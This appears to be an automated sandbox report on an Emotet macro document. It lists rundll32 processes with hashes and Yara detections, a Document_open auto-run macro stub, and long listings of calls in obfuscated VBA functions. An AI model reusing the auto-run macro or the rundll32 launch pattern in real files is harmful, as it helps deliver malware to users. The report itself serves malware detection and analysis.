Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2456 Parent PID: 2824

General

Start time:	18:44:49
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
Imagebase:	0x1e0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2496 Parent PID: 2456

General

Start time:	18:44:50
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
Imagebase:	0x1e0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: A5gd21klfqu9c6rs

Declaration

Line	Content
1	Attribute VB_Name = "A5gd21klfqu9c6rs"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 120, Strings: 0, Number of lines: 3, Relevance: 181.503

APIs	Meta Information
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Zw1k7hcmdl66
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Item
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Hyii7r76oq89
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: diCXTi
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: NZiApKAp
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vrYYHIDxI
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: gzTFLxb
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: PjNhJNA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: oAaNlB
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: sySRJ
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UwyYSBsBN
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tpOgXmm
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: MHYlQAD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: GznGGHyG
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: bbsIZ
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Name
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Application
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: swNGWdd
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: rJEkbLH
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vEBqHrDnD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tWcKo
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: LzxxRHG
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: EKezHIC
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: DpYbmDA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hDJDJ
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: dXiwA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hFSyAfFrF
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hXxQDACJA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: xkQqDXCcD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Len
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lBenBDA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UavHTIBHo
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: IcAHwPH
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: BNmrm
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FLtYjKHC
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: qAUhkIMz
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Create
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: V2enhc4htwl7z6bh
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Thriap3q9rgf3yy9y
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: zZuzBZGD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: OIbfvEEFF
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: eLmLDU
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FYVZFEH
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hoyzuBGCP
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lADFBaJ

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	G8xesq0b8jlsfrsp	executed
11	End Sub

Module: Owppnp8hah4xo788

Declaration

Line	Content
1	Attribute VB_Name = "Owppnp8hah4xo788"

Executed Functions

Function G8xesq0b8jlsfrsp, APIs: 624, Strings: 66, Number of lines: 195, Relevance: 1394.195

APIs	Meta Information
Zw1k7hcmdl66
Item
Hyii7r76oq89
diCXTi
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
NZiApKAp
Close
vrYYHIDxI
gzTFLxb
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
PjNhJNA
Close
oAaNlB
sySRJ
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
UwyYSBsBN
Close
tpOgXmm
MHYlQAD
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
GznGGHyG
Close
bbsIZ
Mid
Name
Application
swNGWdd
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
rJEkbLH
Close
vEBqHrDnD
tWcKo
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
